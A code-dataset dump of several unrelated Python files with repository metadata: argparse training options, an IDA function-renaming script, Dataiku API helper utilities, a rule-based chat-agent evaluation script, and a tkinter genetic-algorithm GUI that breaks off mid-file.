print("Number ppf: " + str(np.mean(nn))) | 37.015873 | 88 | 0.566038 | 378 | 2,332 | 3.455026 | 0.283069 | 0.057427 | 0.036753 | 0.049005 | 0.193721 | 0.127871 | 0.032159 | 0 | 0 | 0 | 0 | 0.024972 | 0.227273 | 2,332 | 63 | 89 | 37.015873 | 0.699778 | 0.014151 | 0 | 0 | 0 | 0 | 0.223366 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016393 | false | 0 | 0.04918 | 0 | 0.065574 | 0.098361 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e5cac362fd7becca5b4e9afc47ee9bbe359228c | 3,623 | py | Python | Asura/options.py | ChunhuiWang-China/Asura | 751b3e7b7e69b612092dc39f60a1289ccd2fdacf | [
"Apache-2.0"
] | null | null | null | Asura/options.py | ChunhuiWang-China/Asura | 751b3e7b7e69b612092dc39f60a1289ccd2fdacf | [
"Apache-2.0"
] | null | null | null | Asura/options.py | ChunhuiWang-China/Asura | 751b3e7b7e69b612092dc39f60a1289ccd2fdacf | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright (C) 2020 ATHENA AUTHORS; Chunhui Wang
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import argparse
import sys
from Asura import utils
def get_preprocessing_parser():
pass
def get_parser(descript):
#to import optional user models
usr_parser = argparse.ArgumentParser(add_help=False, allow_abbrev=False)
usr_parser.add_argument("--user-dir", default=None)
usr_args, _ = usr_parser.parse_known_args()
utils.import_user_module(usr_args)
parser = argparse.ArgumentParser(allow_abbrev=False)
parser.add_argument('--no-progress-bar', action='store_true', help='disable progress bar')
parser.add_argument('--log-interval', type=int, default=1000, metavar='N',
help='log progress every N batches (when progress bar is disabled)')
parser.add_argument('--log-format', default=None, help='log format to use',
choices=['json', 'none', 'simple', 'tqdm'])
parser.add_argument('--tensorboard-logdir', metavar='DIR', default='',
help='path to save logs for tensorboard, should match --logdir '
'of running tensorboard (default: no tensorboard logging)')
parser.add_argument('--seed', default=1, type=int, metavar='N',
help='pseudo random number generator seed')
parser.add_argument('--cpu', action='store_true', help='use CPU instead of CUDA')
parser.add_argument('--fp16', action='store_true', help='use FP16')
parser.add_argument('--memory-efficient-fp16', action='store_true',
help='use a memory-efficient version of FP16 training; implies --fp16')
parser.add_argument('--fp16-no-flatten-grads', action='store_true',
help='don\'t flatten FP16 grads tensor')
parser.add_argument('--fp16-init-scale', default=2 ** 7, type=int,
help='default FP16 loss scale')
parser.add_argument('--fp16-scale-window', type=int,
help='number of updates before increasing loss scale')
parser.add_argument('--fp16-scale-tolerance', default=0.0, type=float,
help='pct of updates that can overflow before decreasing the loss scale')
parser.add_argument('--min-loss-scale', default=1e-4, type=float, metavar='D',
help='minimum FP16 loss scale, after which training is stopped')
parser.add_argument('--threshold-loss-scale', type=float,
help='threshold FP16 loss scale from below')
parser.add_argument('--user-dir', default=None,
help='path to a python module containing custom extensions (tasks and/or architectures)')
parser.add_argument('--empty-cache-freq', default=0, type=int,
help='how often to clear the PyTorch CUDA cache (0 to disable)')
parser.add_argument('--all-gather-list-size', default=16384, type=int,
help='number of bytes reserved for gathering stats from workers')
| 55.738462 | 113 | 0.648358 | 464 | 3,623 | 4.978448 | 0.426724 | 0.07013 | 0.132468 | 0.041126 | 0.120346 | 0.083117 | 0.060606 | 0 | 0 | 0 | 0 | 0.018675 | 0.216671 | 3,623 | 64 | 114 | 56.609375 | 0.795278 | 0.191002 | 0 | 0 | 0 | 0 | 0.38414 | 0.038448 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046512 | false | 0.023256 | 0.093023 | 0 | 0.139535 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e5f0a4fe7e7e73e2f32d387064e5e6f466c4d4a | 678 | py | Python | hard-gists/540f615dd9d54de47dc52b0ca60522c1/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 21 | 2019-07-08T08:26:45.000Z | 2022-01-24T23:53:25.000Z | hard-gists/540f615dd9d54de47dc52b0ca60522c1/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 5 | 2019-06-15T14:47:47.000Z | 2022-02-26T05:02:56.000Z | hard-gists/540f615dd9d54de47dc52b0ca60522c1/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 17 | 2019-05-16T03:50:34.000Z | 2021-01-14T14:35:12.000Z | import idc
import idaapi
import idautils
def rename_sub_functions(fva, prefix):
sub_funcs = set([])
for f in idautils.Functions():
for xref in idautils.XrefsTo(f):
subf = idaapi.get_func(xref.frm)
if not subf:
continue
if subf.startEA == fva:
sub_funcs.add(f)
break
for sub_func in sub_funcs:
current_name = idc.GetFunctionName(sub_func)
if current_name.startswith(prefix):
continue
new_name = prefix + current_name
idc.MakeName(sub_func, new_name)
if __name__ == '__main__':
rename_sub_functions(idc.ScreenEA(), "test_") | 26.076923 | 52 | 0.60177 | 83 | 678 | 4.614458 | 0.433735 | 0.062663 | 0.093995 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.312684 | 678 | 26 | 53 | 26.076923 | 0.821888 | 0 | 0 | 0.095238 | 0 | 0 | 0.019146 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.142857 | 0 | 0.190476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e612b9caed715a208be676dea31ebb9476b48db | 1,785 | py | Python | python-lib/dku_utils.py | dataiku/dss-plugin-api-connect | 805e14dd9cd41e889219cacd5de124b2c9488cfc | [
"Apache-2.0"
] | 2 | 2021-05-21T19:16:42.000Z | 2021-12-10T08:02:30.000Z | python-lib/dku_utils.py | dataiku/dss-plugin-api-connect | 805e14dd9cd41e889219cacd5de124b2c9488cfc | [
"Apache-2.0"
] | 10 | 2021-05-25T00:03:28.000Z | 2022-03-29T15:01:41.000Z | python-lib/dku_utils.py | dataiku/dss-plugin-api-connect | 805e14dd9cd41e889219cacd5de124b2c9488cfc | [
"Apache-2.0"
] | 2 | 2021-05-28T10:41:35.000Z | 2022-02-04T08:14:47.000Z | import json
import copy
def get_dku_key_values(endpoint_query_string):
return {key_value.get("from"): key_value.get("to") for key_value in endpoint_query_string if key_value.get("from")}
def get_endpoint_parameters(configuration):
endpoint_parameters = [
"endpoint_url",
"http_method",
"endpoint_query_string",
"endpoint_body",
"endpoint_headers",
"body_format",
"text_body",
"key_value_body",
"extraction_key",
"raw_output",
"ignore_ssl_check",
"timeout",
"requests_per_minute",
"pagination_type",
"next_page_url_key",
"top_key", "skip_key", "maximum_number_rows"
]
parameters = {endpoint_parameter: configuration.get(endpoint_parameter) for endpoint_parameter in endpoint_parameters if configuration.get(endpoint_parameter) is not None}
return parameters
def parse_keys_for_json(items):
ret = {}
for key in items:
value = items.get(key)
if isinstance(value, dict) or isinstance(value, list):
ret.update({key: json.dumps(value)})
elif value is None:
continue
else:
ret.update({key: value})
return ret
def get_value_from_path(dictionary, path, default=None, can_raise=True):
ret = copy.deepcopy(dictionary)
for key in path:
if key in ret and isinstance(ret, dict):
ret = ret.get(key)
else:
error_message = "The extraction path {} was not found in the incoming data".format(path)
if can_raise:
raise ValueError(error_message)
elif default:
return default # [{"error": error_message}]
else:
return None
return ret
| 30.254237 | 175 | 0.620728 | 212 | 1,785 | 4.971698 | 0.372642 | 0.045541 | 0.05408 | 0.028463 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.285154 | 1,785 | 58 | 176 | 30.775862 | 0.826019 | 0.014566 | 0 | 0.1 | 0 | 0 | 0.174161 | 0.011952 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0 | 0.04 | 0.02 | 0.24 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e612c811f3062b1a02b66228faab15470efaa06 | 3,673 | py | Python | agents/rule_based/run_rulebased_agent.py | didi/MEEP | eb668fe598e40d244f204363d360babbe1fe0dc2 | [
"Apache-2.0"
] | 17 | 2020-09-09T02:32:14.000Z | 2021-10-01T09:46:40.000Z | agents/rule_based/run_rulebased_agent.py | didi/MEEP | eb668fe598e40d244f204363d360babbe1fe0dc2 | [
"Apache-2.0"
] | 2 | 2020-12-02T09:10:03.000Z | 2020-12-02T20:31:05.000Z | agents/rule_based/run_rulebased_agent.py | didi/MEEP | eb668fe598e40d244f204363d360babbe1fe0dc2 | [
"Apache-2.0"
] | 3 | 2020-10-10T09:14:43.000Z | 2022-01-18T02:36:31.000Z | '''Tool to see how well this agent performs on training data'''
import os
import sys
import json
from glob import glob
from keys import keys
sys.path.extend([
# for loading main backend stuff
os.path.join(sys.path[0], '../../gui/backend'),
os.path.join(sys.path[0], '../..') # for loading agents, apis
])
# remove current directory to eliminate naming conflict with utils
sys.path = sys.path[1:]
from app_factory import AppFactory
from apis import MapInterface
from agents.agent import create_agent
def prepare_two_turn_dataset(split="train"):
dataset_dir = '/home/shared/speech_based_destination_chat/dataset/json/%s' % split
dialog_jsons = []
for fname in sorted(glob(dataset_dir + "/*.json")):
with open(fname) as f:
try:
j = json.load(f)
dialog_jsons.append(j)
except json.decoder.JSONDecodeError:
print("Warning couldn't decode json in", fname)
continue
print("loaded %d dialogs" % len(dialog_jsons))
two_turn_examples = []
for dialog in dialog_jsons:
user_utts = []
prev_event_type = None
for event in dialog['events']:
if len(user_utts) == 2 and event['event_type'] != "user_utterance":
break
if event["event_type"] == "user_utterance":
if prev_event_type == "user_utterance":
user_utts[-1] += " " + event['utterance']
else:
user_utts.append(event['utterance'])
prev_event_type = event['event_type']
assert len(user_utts) <= 2
if len(user_utts) == 2:
two_turn_examples.append(user_utts)
return two_turn_examples
def get_received(socket_client):
'''return a list of messages received from the server from the agent'''
result = []
for variable in socket_client.get_received():
if variable['name'] == '/message' and variable['args'][0]['sender'] == 'agent':
result.append(variable['args'][0]['body'])
return result
if __name__ == '__main__':
# Set up message passing and agent
destination_app = AppFactory(
[MapInterface(map_provider='google', api_key=keys['google_maps'])])
_flask_client, socket_client = destination_app.create_test_clients()
agent = create_agent(
'agents.rule_based_agent.RuleBasedAgent',
lambda lat, long: None,
destination_app.interfaces,
)
destination_app.set_agent(agent)
# Consume startup messages
socket_client.get_received()
# Test agent by writing training data to it
split = 'train'
two_turn_examples = prepare_two_turn_dataset(split)
out_fname = "two_turn_examples.%s.txt" % split
with open(out_fname, "w") as out_f:
for i, turns in enumerate(two_turn_examples):
user_utt_1, user_utt_2 = turns
# Send test messages to user
socket_client.emit(
'/message', {'sender': 'user', 'body': user_utt_1})
response1 = get_received(socket_client)
socket_client.emit(
'/message', {'sender': 'user', 'body': user_utt_2})
response2 = get_received(socket_client)
# Write to output file
out_f.write(
"\n".join(
("dialog_idx %d" %
i,
user_utt_1,
*
response1,
user_utt_2,
*
response2)) +
"\n\n")
agent.reset()
print("Finished writing examples to", out_fname)
| 33.390909 | 87 | 0.589164 | 439 | 3,673 | 4.697039 | 0.359909 | 0.027158 | 0.043647 | 0.017459 | 0.125121 | 0.060136 | 0.042677 | 0.042677 | 0.042677 | 0 | 0 | 0.007422 | 0.303022 | 3,673 | 109 | 88 | 33.697248 | 0.798047 | 0.106997 | 0 | 0.02381 | 0 | 0 | 0.139792 | 0.036787 | 0 | 0 | 0 | 0 | 0.011905 | 1 | 0.02381 | false | 0 | 0.095238 | 0 | 0.142857 | 0.035714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e64a87dd93b7d21172bf0a288a05134654a4e71 | 28,290 | py | Python | gui.py | gk2803/project01_ga | 856f19dea73e78b2dd21efcfa7b88dba541542a5 | [
"MIT"
] | null | null | null | gui.py | gk2803/project01_ga | 856f19dea73e78b2dd21efcfa7b88dba541542a5 | [
"MIT"
] | null | null | null | gui.py | gk2803/project01_ga | 856f19dea73e78b2dd21efcfa7b88dba541542a5 | [
"MIT"
] | null | null | null | import tkinter as tk
from tkinter import END
from tkinter import ttk
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import (
FigureCanvasTkAgg,
)
from gnt import *
from matplotlib.ticker import MaxNLocator
import threading
class MainWindow:
def __init__(self, root, color):
self.color = color
self.root = root
self.root.resizable(0, 0)
self.root.geometry("700x850")
self.root.title("Γενετικοί")
# self.root.columnconfigure(0,weight=1)
# self.root.rowconfigure(8, weight=1)
self.root.configure(bg=self.color)
"""Frames"""
self.top_frame = tk.Frame(
self.root,
width=450,
height=400,
pady=3,
bg=self.color,
relief=tk.RIDGE,
bd=8,
)
self.bot_frame = tk.Frame( # γραφική παράσταση και κάτω
self.root, width=450, height=400, pady=3, bg=self.color,
)
self.inner_frame = tk.Frame( # κάτω από τα sliders
self.top_frame,
width=450,
height=200,
pady=3,
relief=tk.RIDGE,
bd=3,
bg=self.color,
)
"""labels"""
# top_frame
variables_label = tk.Label( # Πεδία Ορισμού
self.top_frame,
text=" Πεδία Ορισμού ",
fg="#000000",
font="Courier ",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
function_label = tk.Label( # Συνάρτηση
self.top_frame,
text="Συνάρτηση",
fg="#000000",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
population_label = tk.Label(
self.top_frame,
text="Πληθυσμός", # Πληθυσμός
fg="#000000",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
generations_label = tk.Label(
self.top_frame, # Γενιές
text="Γενιές",
fg="black",
font="Courier ",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
pm_label = tk.Label( # Π. Μετάλλξης
self.top_frame,
text="Π. Μετάλλαξης",
fg="black",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
pc_label = tk.Label( # Π. Διασταύρωσης
self.top_frame,
text="Π. Διασταύρωσης",
fg="black",
font="Courier ",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
cp_label = tk.Label( # Σημ. Διασταύρωσης
self.top_frame,
text="Σημ. Διασταύρωσης",
fg="black",
font="Courier ",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
bits_label = tk.Label( # bits
self.top_frame,
text="Bits",
fg="black",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
selection_label = tk.Label( # Τελεστής Επιλογής
self.top_frame,
text="Τελεστής Επιλογής",
fg="black",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
self.bounds_label = tk.Label( # label που εμφανίζει ΤΙΚ σε περίπτωση σωστής καταχώρησης πεδίου ορισμού, διαφορετικά Χ
self.top_frame,
text="",
bg=self.color,
)
# top frame - sliders
self.pop_slider = tk.Scale( # πληθυσμός
self.top_frame,
from_=2,
to=500,
resolution=2,
orient="horizontal",
bg=self.color,
)
self.generation_slider = tk.Scale( # Γενιές
self.top_frame,
from_=2,
to=1000,
resolution=1,
orient="horizontal",
bg=self.color,
)
self.pm_slider = tk.Scale( # π. διασταύρωσης
self.top_frame,
from_=0,
to=1,
resolution=0.001,
orient="horizontal",
bg=self.color,
)
self.pc_slider = tk.Scale( # π. μετάλλαξης
self.top_frame,
from_=0,
to=1,
resolution=0.01,
orient="horizontal",
bg=self.color,
)
self.bits_slider = tk.Scale( # bits
self.top_frame,
from_=2,
to=40,
resolution=1,
orient="horizontal",
command=self.update_scale,
bg=self.color,
)
self.cp_slider = tk.Scale( # σημ. διαστάυρωσης
self.top_frame,
from_=1,
to=self.bits_slider.get(),
resolution=1,
orient="horizontal",
bg=self.color,
)
###################################################################################################################
################################## DROPDOWN ###################################################################
###################################################################################################################
# top frame - dropdowns
self.bounds_var = tk.StringVar(self.top_frame) #μεταβλητή δευτέρου dropdown-menu, (x,y,z)
self.bounds_input = tk.StringVar() #εισαχθέντα από τον χρήστη πεδία ορισμού
self.var_number = tk.IntVar() #αριθμός μεταβλητών - πρώτο dropdown-menu
self.function_entry = tk.StringVar() #είσοδος συνάρτησης
self.radio_var = tk.IntVar() #μεταβλητή τελεστή επιλογής
self.choices = {
"x": "0,10",
"y": "0,20",
"z": "0,30"
}
self.option = tk.OptionMenu(self.top_frame, self.bounds_var, *self.choices)
self.option2 = tk.OptionMenu(self.top_frame, self.var_number, *[*range(1,4)],command=self.set_vars )
# function
self.function = ttk.Combobox(self.top_frame, textvariable=self.function_entry,width=35,height=10)
self.func_dict = {
'Beale function':'(1.5-x+x*y)**2+(2.25-x+x*y**2)**2+(2.625-x+x*y**3)**2',
'Booth function':'(x+2*y-7)**2 +(2*x +y -5)**2',
'Matyas function':'0.26*(x**2+y**2)-0.48*x*y',
'Himmelblau\'s function':'(x**2+y-11)**2 + (x+y**2-7)**2',
'Three-hump camel function':'2*x**2-1.05*x**4+x**6/6+x*y+y**2',
'project function':'x**2 + y**3 + z**4 + x*y*z'
}
#adding combobox drop down list
self.function['values']=list(self.func_dict.keys())
self.function.bind("<<ComboboxSelected>>",self.boxcallbackFunc)
# bounds
self.vars_entry = tk.Entry(
self.top_frame, width=10, font="Courier", text=self.bounds_input, justify='center'
)
self.vars_entry.bind("<Return>", self.bind_func)
# radio buttons
self.tourn_button = tk.Radiobutton(
self.top_frame, bg=self.color, text="Tournament", variable=self.radio_var, value=1
)
self.roulette_button = tk.Radiobutton(
self.top_frame,
bg=self.color,
text="Roulette wheel",
variable=self.radio_var,
value=2,
)
###################################################################################################################
# inner frame
cur_label = tk.Label( # Τρέχων
self.inner_frame,
text="Τρέχων",
fg="white",
font="Courier",
bg="#343434",
relief="raised",
borderwidth=2,
)
bestest_label = tk.Label( # best
self.inner_frame,
text=" Best ",
fg="white",
font="Courier",
bg="#343434",
relief="raised",
borderwidth=2,
)
gener_label = tk.Label( # Γενιά
self.inner_frame,
text=" Γενιά ",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
best_label = tk.Label( # Best fitness
self.inner_frame,
text="Best Fitness",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
average_label = tk.Label( # Average fitness
self.inner_frame,
text="Average Fitness",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
gener_label2 = tk.Label( # Γενιά
self.inner_frame,
text=" Γενιά ",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
x0 = tk.Label( # x
self.inner_frame,
text="x",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
x1 = tk.Label( # y
self.inner_frame,
text="y",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
x2 = tk.Label( # z
self.inner_frame,
text=" z ",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
cur_label2 = tk.Label( # τρέχων
self.inner_frame,
text="Τρέχων",
fg="white",
font="Courier",
bg="#343434",
relief="raised",
borderwidth=2,
)
bestest_label2 = tk.Label( # Best
self.inner_frame,
text=" Best ",
fg="white",
font="Courier",
bg="#343434",
relief="raised",
borderwidth=2,
)
self.gener_output = tk.Label( # Output Τρέχων - Γενιά
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_output = tk.Label( # Output τρέχων - Best Fitness
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.avg_output = tk.Label( # Output τρέχων - average fitness
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_gen_output = tk.Label( # output Best - Γενιά
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_sol_output = tk.Label( # output Best - Best Fitness
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.gener2_output = tk.Label( # output Τρέχων - Γενιά (δεύτερο μπλοκ)
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.x0_output = tk.Label( # output Τρέχων - X
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.x1_output = tk.Label( # output Τρέχων - Y
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.x2_output = tk.Label( # output Τρέχων - z
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.x_outputs =[self.x0_output, self.x1_output, self.x2_output]
self.best_gener2_output = tk.Label( # output Best - Γενιά (κάτω μπλοκ)
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_x0_output = tk.Label( # output Best - x
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_x1_output = tk.Label( # output Best - y
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_x2_output = tk.Label( # output Best - z
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.bestx_output =[self.best_x0_output, self.best_x1_output, self.best_x2_output]
# bottom frame
self.maximize_button = tk.Button( # maximize button
self.bot_frame,
text="maximize",
width=10,
font="Courier 14",
command=lambda: threading.Thread(target=self.maximize).start(),
relief='ridge'
)
self.minimize_button = tk.Button( # minimize button
self.bot_frame,
text="minimize",
width=10,
font="Courier 14",
command=lambda: threading.Thread(target=self.minimize).start(),
relief='ridge'
)
exit_button = tk.Button( # exit butotn
self.bot_frame,
text="exit",
width=10,
font="Courier 14",
command=self.root.destroy,
relief='ridge'
)
# canvas
self.fig = plt.Figure(figsize=(7, 4), dpi=100, facecolor="#efebe9")
self.canvas = FigureCanvasTkAgg( # plot
self.fig,
master=self.bot_frame,
)
self.axes = self.fig.add_subplot(111)
############################################################################################################
###################################### GRIDS ############################################################
############################################################################################################
'''grids'''
# frames
self.inner_frame.grid(row=7, columnspan=5, sticky="nsew")
self.top_frame.grid(row=0)
self.bot_frame.grid(row=1)
self.inner_frame.columnconfigure(2, weight=3)
# top frame
variables_label.grid(row=0, column=0, sticky="nsew") # dropdown αριθμός μεταβλητών
generations_label.grid(row=4, column=0, sticky="nsew") # Γενιές label
population_label.grid(row=0, column=1, sticky="nsew") # Πληθυσμός label
cp_label.grid(row=0, column=2, sticky="nsew") # Σημ. Διασταύρωσης label
function_label.grid(row=2, column=0, sticky="nsew") # Συνάρτηση label
pc_label.grid(row=2, column=1, sticky="nsew") # Π. Διασταύρωσης label
bits_label.grid(row=2, column=2, sticky="nsew") # Bits label
pm_label.grid(row=4, column=1, sticky="nsew") # Π. Μετάλλαξης label
selection_label.grid(row=4, column=2, sticky="nsew") # Τελεστής επιλογής label
self.bounds_label.grid(row=1, column=0,sticky=tk.E ) # ΤΙΚ / Χ label
# inner
cur_label.grid(row=1, column=0) # Τρέχων label (πρώτο μπλοκ)
bestest_label.grid(row=2, column=0) # Best label (πρώτο μπλοκ)
gener_label.grid(row=0, column=1) # Γενιά label (πρώτο μπλοκ)
best_label.grid(row=0, column=2) # Best Fitness label
average_label.grid(row=0, column=3, columnspan=2, sticky="nsew") # Average fitness label
gener_label2.grid(row=3, column=1) # Γενιά label (δεύτερο μπλοκ)
x0.grid(row=3, column=2, sticky="nsew") # x label (δεύτερο μπλοκ)
x1.grid(row=3, column=3, columnspan=2, sticky="nsew") # y label (δεύτερο μπλοκ)
x2.grid(row=3, column=5,sticky='nsew',columnspan=3) # z label (δεύτερο μπλοκ)
cur_label2.grid(row=4, column=0) # Τρέχων label (δεύτερο μπλοκ)
bestest_label2.grid(row=5, column=0) # Best label (δεύτερο μπλοκ)
# outputs
self.gener_output.grid(row=1, column=1) # Τρέχων - γενιά, output (πρώτο μπλοκ)
self.best_output.grid(row=1, column=2) # Τρέχων - Best Fitness, output (πρώτο μπλοκ)
self.avg_output.grid(row=1, column=3) # Τρέχων - Average Fitness, output (πρώτο μπλοκ)
self.best_gen_output.grid(row=2, column=1) # Best -Γενιά, output (πρώτο μπλοκ)
self.best_sol_output.grid(row=2, column=2) # Best - Best Fitness, output (πρώτο μπλοκ)
self.gener2_output.grid(row=4, column=1) # Τρέχων - Γενιά, output (δεύτερο μπλοκ)
self.x0_output.grid(row=4, column=2) # Τρέχων - X output (δεύτερο μπλοκ)
self.x1_output.grid(row=4, column=3) # Τρέχων - Y output (δεύτερο μπλοκ)
self.x2_output.grid(row=4, column=5) # Τρέχων - Z output (δεύτερο μπλοκ)
self.best_gener2_output.grid(row=5, column=1) # Best - Γενιά, output (δεύτερο μπλοκ)
self.best_x0_output.grid(row=5, column=2) # Best - X, output (δεύτερο μπλοκ)
self.best_x1_output.grid(row=5, column=3) # Best - Y, output (δεύτερο μπλοκ)
self.best_x2_output.grid(row=5, column=5) # Best - Z, output (δεύτερο μπλοκ)
# sliders
self.pop_slider.grid(row=1, column=1,sticky='nsew') # πληθυσμός
self.generation_slider.grid(row=5, column=0,sticky='nsew') # γενιές
self.pm_slider.grid(row=5, column=1,sticky='nsew') # π. μετάλλαξης
self.pc_slider.grid(row=3, column=1,sticky='nsew') # π. διασταύρωσης
self.bits_slider.grid(row=3, column=2,) # bits
self.cp_slider.grid(row=1, column=2,) # σημ. διασταύρωσης
# dropdown bounds
self.option.grid(row=1, column=0,padx=(0,50) ) # Πεδία ορισμού δεύτερο dropdown-menu (x,y,z)
self.option2.grid(row=1, column=0, sticky=tk.W) # Πεδία ορισμού πρώτο dropdown-menu (1,2,3)
# function entry
self.function.grid(row=3, column=0,) # συνάρτηση
#bounds entry
self.vars_entry.grid(row=1, column=0, padx=(110,0)) # Πεδία ορισμού - Είσοδος πεδίων όρισμού
# buttons
self.maximize_button.grid(row=2, column=0, sticky=tk.W) # maximize
self.minimize_button.grid(row=2, column=1) # minimize
exit_button.grid(row=2, column=2, sticky=tk.E) # exit
# radio buttons
self.tourn_button.grid(row=5, column=2) # radio - tournament
self.roulette_button.grid(row=6, column=2) # radio - roulette wheel
# canvas
self.canvas.get_tk_widget().grid(row=0, column=0, columnspan=3) # graph
"""αρχικοποίηση τιμών"""
self.pop_slider.set(100)
self.generation_slider.set(150)
self.pm_slider.set(0.01)
self.pc_slider.set(0.8)
self.bits_slider.set(30)
self.var_number.set(3)
self.bounds_input.set("0,10")
self.radio_var.set(1)
self.bounds_var.set(list(self.choices.keys())[0])
self.function.set("x**2 + y**3 + z**4 + x*y*z")
"""traced var"""
self.bounds_var.trace("w", self.bounds_f)
"""mainloop"""
self.root.mainloop()
#
def set_vars(self,event):
"""
καθορίζει τον αριθμό των μεταβλητών,
ενημερώνει ανάλογα το dropdown menu των μεταβλητών x-y-z
"""
menu = self.option.children["menu"]
menu.delete(0,"end")
n = self.var_number.get()
t=['x','y','z']
t=[t[i] for i in range(n)]
#initializes bounds
self.choices = dict(zip(t,["-10,10"]*n))
#creates the second drop down menu
for val in self.choices.keys():
menu.add_command(label=val, command=tk._setit(self.bounds_var,val))
self.bounds_var.set(list(self.choices.keys())[0])
def boxcallbackFunc(self,event):
"""
τοποθετεί σαν input το value του λεξικού έτοιμων συναρτήσεων
https://www.etutorialspoint.com/index.php/347-python-tkinter-ttk-combobox-event-binding
"""
self.function = event.widget.get()
self.function_entry.set(self.func_dict[self.function])
def bind_func(self, event):
"""
στο <enter> εμφανίζει κατάλληλο μήνυμα για αποδοχή ή όχι των πεδίων ορισμού,
παράλληλα ενημερώνει το λεξικό self.choices με τα αποδεκτά πεδία ορισμού
"""
if not self.mk_int(self.vars_entry.get()):
self.bounds_label.config(text="❌", font="Courier", fg="red")
else:
self.bounds_label.config(text="✓", font="Courier", fg="green")
self.choices[self.bounds_var.get()] = self.vars_entry.get()
def bounds_f(self, *args):
"""trace var method"""
var2_ = self.choices[self.bounds_var.get()]
self.bounds_input.set(var2_)
self.bounds_label.config(text="")
def update_scale(self, new_max):
"""configures slider's max val"""
self.cp_slider.configure(to=int(new_max) - 1)
@staticmethod
def mk_int(s):
"""επιστρέφει True αν τα πεδία ορισμού είναι αποδεκτά, διαφορετικά False"""
try:
x, y = s.split(",")
if int(x) >= int(y):
raise ValueError
return True
except ValueError:
return False
def extract_bounds(self, dict) -> list:
"""
επιστρέφει τα πεδία ορισμού σε μορφή λίστας
"""
